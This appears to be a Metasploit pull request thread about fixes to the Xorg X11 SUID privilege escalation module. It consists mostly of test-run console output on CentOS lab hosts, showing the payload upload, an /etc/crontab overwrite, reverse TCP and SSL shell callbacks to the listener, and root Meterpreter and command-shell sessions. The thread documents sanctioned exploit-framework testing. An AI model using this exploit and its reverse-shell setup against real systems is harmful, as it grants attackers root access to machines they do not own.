Improve Xorg_privesc module consolelock check, payload upload & formatting

[aringo]

Was asked to make some adjustments to the check for console lock along with payload upload and formatting. Adjusted and then tested on CentOS and OpenBSD6.4.

msf5 exploit(multi/local/xorg_x11_suid_server) > exploit 

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.30.0.2:4444 
[*] Running additional check for Linux
[+] Console lock for peep
[+] Selinux is not an issue
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.5 is vulnerable
[+] Xorg does not appear running
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Max line length is 65537
[*] Writing 911224 bytes in 56 chunks of 39672 bytes (octal-encoded), using printf
[*] Next chunk is 43977 bytes
....... snipped ............
[*] Next chunk is 40137 bytes
[*] Trying /etc/crontab overwrite
[+] /etc/crontab overwrite successful
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Meterpreter session 2 opened (172.30.0.2:4444 -> 172.30.0.60:40608) at 2018-11-24 14:44:13 -0600
[+] Returning session after cleaning
[+] Deleted /tmp/.session-zJFbtiW

meterpreter > cat /etc/crontab
original
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.5.1804 (Linux 3.10.0-862.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

[bcoles]

Thanks. Apologies for the confusion. I didn't have a chance to test the previous PR before it was landed.

I'll retest this and land.

[bcoles]

CentOS - Command Shell payload

msf5 exploit(multi/local/xorg_x11_suid_server) > run

[*] Started reverse double SSL handler on 172.16.191.188:4444 
[*] Running additional check for Linux
[+] Console lock for user
[+] Selinux is not an issue
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.3 is vulnerable
[!] Xorg in process list
[!] Could not get version or Xorg process possibly running, may fail
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Trying /etc/crontab overwrite
[+] /etc/crontab overwrite successful
[*] Waiting on cron to run
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo zk0jobDMxFdBxLBU;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "zk0jobDMxFdBxLBU\n"
[*] Matching...
[*] B is input...
[*] Command shell session 7 opened (172.16.191.188:4444 -> 172.16.191.141:46318) at 2018-11-24 21:31:04 -0500
[*] Waiting on cron to run
[+] Returning session after cleaning
[+] Deleted /tmp/.session-Tafw0iW0r8

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
uname -a
Linux centos-7-1708.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 7? [y/N]  y
""

[*] 172.16.191.141 - Command shell session 7 closed.  Reason: User exit

CentOS - Meterpreter payload

msf5 exploit(multi/local/xorg_x11_suid_server) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(multi/local/xorg_x11_suid_server) > set target 1
target => 1
msf5 exploit(multi/local/xorg_x11_suid_server) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Running additional check for Linux
[+] Console lock for user
[+] Selinux is not an issue
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.3 is vulnerable
[!] Xorg in process list
[!] Could not get version or Xorg process possibly running, may fail
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Trying /etc/crontab overwrite
[+] /etc/crontab overwrite successful
[*] Waiting on cron to run
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (816260 bytes) to 172.16.191.141
[*] Meterpreter session 8 opened (172.16.191.188:4444 -> 172.16.191.141:46320) at 2018-11-24 21:32:02 -0500
[+] Returning session after cleaning
[+] Deleted /tmp/.session-hFXoMJcW0

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : centos-7-1708.localdomain
OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.191.141 - Meterpreter session 8 closed.  Reason: User exit
msf5 exploit(multi/local/xorg_x11_suid_server) > 

[bcoles]

Release Notes

This fixes various issues related to Linux targets in the Xorg X11 Server SUID privilege escalation module.